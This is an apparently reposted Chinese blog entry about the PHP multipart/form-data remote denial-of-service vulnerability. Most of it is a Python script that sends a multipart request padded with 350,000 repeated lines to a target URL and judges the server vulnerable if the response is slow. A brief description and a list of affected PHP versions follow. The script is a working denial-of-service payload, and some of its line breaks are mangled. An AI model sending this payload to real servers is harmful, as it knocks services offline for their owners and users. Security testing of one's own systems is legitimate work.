• PHP multipart/form-data 远程DOS漏洞

    import sys
import urllib,urllib2
import datetime
from optparse import OptionParser
def http_proxy(proxy_url):
    proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy
def check_php_multipartform_dos(url,post_body,headers):
    req = urllib2.Request(url)
    for key in headers.keys():
        req.add_header(key,headers[key])
    starttime = datetime.datetime.now();
    fd = urllib2.urlopen(req,post_body)
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime=(endtime - starttime).seconds
    if(usetime > 5):
        result = url+" is vulnerable";
    else:
        if(usetime > 3):
            result = "need to check normal respond time"
    return [result,usetime]
#end
def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                  dest="target",
                  default=False,
                  type="string",
                  help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
        target = options.target
    else:
        return;
    Num=350000
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
            'Accept-Encoding':'gzip, deflate',
            'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = 
"------WebKitFormBoundaryX3B7rDMPcQlzmJE1
Content-Disposition: 
form-data; name="file"; filename=sp.jpg"
    payload=""
    for i in range(0,Num):
        payload = payload + "a
"
    body = body + payload;
body = body + 
"Content-Type: application/octet-stream

datadata
------
WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";
if __name__=="__main__":
    main()

      

    PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8
  • 相关阅读:
    javaoop初级入门继承和封装和接口和多态和抽象类
    java基础的几种 函数
    sql server 2008子查询的学习小纪(一)
    中文价码filter
    $http.jsonp和$scope.watch
    普通版选项卡
    面向对象版选项卡
    angular版选项卡
    微信H5--手机键盘弹起导致页面变形
    controller控制器
  • 原文地址:https://www.cnblogs.com/endust/p/11983902.html
Copyright © 2020-2023  润新知